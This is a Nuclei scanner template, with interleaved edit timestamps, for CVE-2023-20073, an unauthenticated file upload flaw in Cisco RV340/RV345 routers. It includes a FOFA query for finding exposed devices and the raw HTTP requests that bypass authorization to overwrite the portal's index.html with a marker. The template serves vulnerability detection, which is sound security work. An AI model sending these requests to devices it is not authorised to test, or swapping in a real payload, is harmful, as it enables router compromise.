2023-08-21 03:01:17 +00:00
id : CVE-2023-20073
info :
2023-08-26 10:06:24 +00:00
name : Cisco VPN Routers - Unauthenticated Arbitrary File Upload
2023-08-21 03:01:17 +00:00
author : princechaddha,ritikchaddha
severity : critical
description : |
A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
2023-09-06 11:43:37 +00:00
remediation : |
Apply the latest security patches provided by Cisco to mitigate this vulnerability.
2023-08-21 03:01:17 +00:00
reference :
- https://unsafe.sh/go-173464.html
- https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f
- https://github.com/RegularITCat/CVE-2023-20073/tree/main
- https://nvd.nist.gov/vuln/detail/CVE-2023-20073
2023-08-26 10:06:24 +00:00
- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-20073
cwe-id : CWE-434
2023-10-14 11:27:55 +00:00
epss-score : 0.52411
2023-11-05 22:23:39 +00:00
epss-percentile : 0.97209
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
2023-08-21 03:01:17 +00:00
metadata :
2023-09-06 11:43:37 +00:00
verified : true
2023-08-26 10:15:16 +00:00
max-request : 3
vendor : cisco
2023-09-06 11:43:37 +00:00
product : rv340_firmware
fofa-query : app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
2023-08-21 03:01:17 +00:00
tags : cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive
2023-08-26 10:06:24 +00:00
variables :
html_comment : "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body
2023-08-21 03:01:17 +00:00
http :
- raw :
2023-08-26 10:06:24 +00:00
- |
GET /index.html HTTP/1.1
Host : {{Hostname}}
2023-08-21 03:01:17 +00:00
- |
POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1
Host : {{Hostname}}
Authorization : 1
Content-Type : multipart/form-data; boundary=------------------------f6f99e26f3a45adf
--------------------------f6f99e26f3a45adf
Content-Disposition : form-data; name="pathparam"
Portal
--------------------------f6f99e26f3a45adf
Content-Disposition : form-data; name="fileparam"
2023-08-26 10:06:24 +00:00
index.html
2023-08-21 03:01:17 +00:00
--------------------------f6f99e26f3a45adf
Content-Disposition : form-data; name="file.path"
2023-08-26 10:06:24 +00:00
index.html
2023-08-21 03:01:17 +00:00
--------------------------f6f99e26f3a45adf
2023-08-26 10:06:24 +00:00
Content-Disposition : form-data; name="file"; filename="index.html"
2023-08-21 03:01:17 +00:00
Content-Type : application/octet-stream
2023-08-26 10:06:24 +00:00
{{index}}
{{html_comment}}
2023-08-21 03:01:17 +00:00
--------------------------f6f99e26f3a45adf--
- |
2023-08-26 10:06:24 +00:00
GET /index.html HTTP/1.1
2023-08-21 03:01:17 +00:00
Host : {{Hostname}}
2023-08-26 10:06:24 +00:00
extractors :
- type : dsl
name : index
internal : true
dsl :
- body_1
2023-08-21 03:01:17 +00:00
matchers :
- type : word
2023-08-26 10:06:24 +00:00
part : body_3
2023-08-21 03:01:17 +00:00
words :
2023-08-31 11:46:18 +00:00
- "{{html_comment}}"
2023-11-05 22:23:39 +00:00
# digest: 4b0a00483046022100cfccf71d8de018cd5f6a25a0584d55aa1de5868f19794d6ce91e25613dfacd56022100c37417a1dfc6d5bd596299221fc095cd822b68ab061aa673ddb7c4fd159ff422:922c64590222798bb761d5b6d8e72950